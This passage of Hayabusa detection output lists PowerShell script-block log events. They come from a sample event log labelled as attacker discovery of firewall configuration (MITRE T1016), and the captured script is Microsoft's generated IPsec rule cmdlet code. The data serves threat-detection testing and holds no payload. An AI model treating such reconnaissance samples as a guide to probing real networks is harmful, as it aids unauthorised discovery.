Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociat",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"edNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 